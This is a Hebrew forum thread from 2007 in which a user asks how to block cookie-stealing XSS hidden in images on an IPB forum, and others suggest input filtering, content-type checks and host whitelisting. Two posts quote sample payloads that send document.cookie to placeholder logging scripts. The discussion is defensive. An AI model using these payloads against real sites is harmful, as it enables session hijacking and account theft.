| כותב |
|
Memb3R
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 01 January 2007 בשעה 16:07 | | IP רשוּם
|
|
|
|
שלום,
לאחרונה נתקלתי באנשים ששמים XSS בתוך תמונה בשביל לגנוב עוגיות
איך אני יוכל למנוע מצב כזה?
תודה לעוזרים
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 01 January 2007 בשעה 17:28 | | IP רשוּם
|
|
|
|
איזו מערכת ?
דמויית phpbb ?
אולי תבדוק שהכתובת של התמונה חוקית, בלי JS ובלי גרש או גרשיים וכו'...?
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
Memb3R
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 01 January 2007 בשעה 18:40 | | IP רשוּם
|
|
|
|
בוא נגיד מערכת IPB
אני לא מדבר איתך על תמונה ששמים
אני מדבר איתך על זה שאנשים יבואו ויגידו לחץ כאן כדי להיכנס ואז זה יוביל אותם לתמונה שתגנוב את העוגיות
יש לך רעיונות למנוע את זה?
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 01 January 2007 בשעה 19:48 | | IP רשוּם
|
|
|
|
איכשהו הם צריכים להפעיל javascript בשביל XSS, תמצא איפה הם מפעילים ותחסום את זה.
דוגמא לקוד חשוד:
קוד:
| [ url=http://www.google.it" onclick="window.location='http://your.phpsite.com/log.php?' + document.cookie"] Link_text [/url] |
|
|
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
Memb3R
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 01 January 2007 בשעה 21:31 | | IP רשוּם
|
|
|
|
זה גם יכול לחסום XSS בתוך התמונה? (זה מה שהתכוונתי עד עכשיו)
כי אני לא התכוונתי XSS בתוך הלחץ כאן
כשלוחצים אז זה מגיע לתמונה שגונבת את הXSS
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 01 January 2007 בשעה 22:22 | | IP רשוּם
|
|
|
|
אי אפשר להבין אם לש תשלח כאן את הקוד ששולחים אצלך...תעשה "הצג מקור" או "view source" או "edit" ותעתיק את זה ותשלח פה (ותסתכל ב-קודי הפורום איך לשלוח קוד)
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
Memb3R
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 05 January 2007 בשעה 14:21 | | IP רשוּם
|
|
|
|
אוקי עכשיו אני יסביר אותי יותר טוב
אני מתכוון שהXSS בתוך התמונה והפקודה היא "לחץ כאן להיכנס"
הנה דוגמה:
לחץ כאן להיכנס
בתוך
הR.GIF יהיה רשום
<SCRIPT>location.href='http://website.com/cookiestealer.php?cookie='+escape(document.cookie)</SCRIPT>
עכשיו זה יעביר לי את הCOOKIES שלו
איך אני יכול לחסום את זה?
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 05 January 2007 בשעה 14:32 | | IP רשוּם
|
|
|
|
נו...אז זה כן איך שאמרתי...
תפתח את הקוד של המערכת שלך, חפש את הפונקציה שאחראית על קידי המערכת (יצירת ה-HTML)
ותשנה אותה ככה שתחליף את <script ב-lt;script& ובכל הכתובות של קישורים ושל תמונות תסיר כל מופע של :javascript ותוודא שאין גרשיים או גרש ואם יש תסיר את כל מה שאחריהם.
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
Memb3R
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 05 January 2007 בשעה 15:06 | | IP רשוּם
|
|
|
|
הצלחתי לחסום בתוך הפורום אבל עדיין לא הבנתי ממש איך אני יוכל לחסום XSS בשרת אחר
זאת אומרת זה בתוך תמונה אז איך אני יוכל לחסום שם XSS?!?
כי משום מה הפורום לא יתן לי לחסום בתוך התמונה את הXSS
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 05 January 2007 בשעה 15:07 | | IP רשוּם
|
|
|
|
מה זאת אומרת ?
פרט מה אתה מנסה לחסום.
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
Memb3R
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 05 January 2007 בשעה 15:15 | | IP רשוּם
|
|
|
|
אני מנסה לחסום את הXSS שיש בתוך התמונה
זאת אומרת כמו שהראתי לך אין שם שום סימן לXSS רק מתי שאתה נכנס לתמונה הזאת
אני מנסה שבכלל שמתי שמישהו ינסה להשים תמונה כזאת אז המערכת תצנזר את זה
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 05 January 2007 בשעה 15:25 | | IP רשוּם
|
|
|
|
אתה יכול לבקש מהשרת יעד HEAD של התמונה ולראות מה ה-content-type, או שאתה
יכול להרשות תמונות רק מהאתר שלך ומ-imageshack...או שתנסהלחפש פתרון בגוגל אולי
בכללי אולי לפי השם של המערכת שלך...
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
notkok
משתמש פעיל
הצטרף / הצטרפה: 13 January 2005
משתמש: מנותק/ת
הודעות: 88
|
| נשלח בתאריך: 05 January 2007 בשעה 18:18 | | IP רשוּם
|
|
|
|
שושן, אתה מפספס אותו לגמרי...
אתה מדבר על csrf ולפי מה שהצלחתי להבין ממנו הוא מדבר על סקריפט שנכתב בתוך תמונה.
Memb3r, אתה יכול לתת דוגמא לתמונה כזאת?
|
| חזרה לתחילת העמוד |
|
| |
אורח
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 09 January 2007 בשעה 12:45 | | IP רשוּם
|
|
|
|
סקריפטים שנכתבים בתוך התמונה ירוצו רק ב-IE, בפיירפוקס לא.
אם התמונה נמצאת על שרת אחר, לא על השרת שלך, אז זה לא ישלח את הקוקיז מהדומיין שלך, אלא מהדומיין שממנו נשלחה התמונה.
כל הבעיה, אם אתה נותן אפשרות להעלות תמונה לשרת שלך, ואז אתה צריך לבדוק את התוכן של התמונה, אם מופיעים בה ה-headers הנכונים, אם לא מופיע script כלשהו וכו'...
|
| חזרה לתחילת העמוד |
|
| |
אבידור
אורח
הצטרף / הצטרפה: 01 October 2003
משתמש: אונליין
הודעות: 12647
|
| נשלח בתאריך: 13 January 2007 בשעה 18:38 | | IP רשוּם
|
|
|
|
אני חושב שהוא מתכוון למה שהסרטון הבא מציג:
http://milw0rm.com/video/
שמה לחצו על הסרטון
(WBB Portal) Cross-Site Scripting Using Unsanitized jpg File
(אחד לפני אחרון)
|
| חזרה לתחילת העמוד |
|
| |
shoshan
מנהל האתר
הצטרף / הצטרפה: 16 July 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 4637
|
| נשלח בתאריך: 13 January 2007 בשעה 19:12 | | IP רשוּם
|
|
|
|
נו...פתרון אפשרי הוא לבדוק שבתמונה אין אז הרצף cookie, כי זה באמת לא נשמע לי שכיח,
או שאפשר גם לחפש בגוגל לפי מערכת, מישהו בטוח כבר פתר את הבעיה,
הבעיה שמי שזה לא יהיה משום מה הוא לא מוכן להגיד איזה מערכת, כאילו שישר מישהו
יחליט לאיזה אתר להציק כשמשעמם לו...
__________________
עד מתי רשעים יעלוזו?
עַל כֵּן אֶמְאַס וְנִחַמְתִּי עַל עָפָר וָאֵפֶר.
|
| חזרה לתחילת העמוד |
|
| |
אבידור
משתמש חבר
הצטרף / הצטרפה: 11 October 2005
מדינה: Israel
משתמש: מנותק/ת
הודעות: 162
|
| נשלח בתאריך: 24 January 2007 בשעה 01:39 | | IP רשוּם
|
|
|
|
אני לא בטוח שזה נכון, אך השערה, כשמישו מעלה קובץ, (במערכת בשפת PHP לפחות) אתה יכול לבדוק את הmime שלו וכך לאתר איזה קובץ זה. אם תרצו אתן דוגמת קוד.
לגבי קישור מאתר, אין לי מושג, אולי יש איזה דרך לאתר את סוג הMIME על ידי פקודה ב PHP בתמונה רחוקה?
|
| חזרה לתחילת העמוד |
|
| |
נושאים פעילים
רשימת משתמשים
חיפוש
עזרה
הרשמה
התחברות
UnderWarrior Forums : 
אבטחת מידע
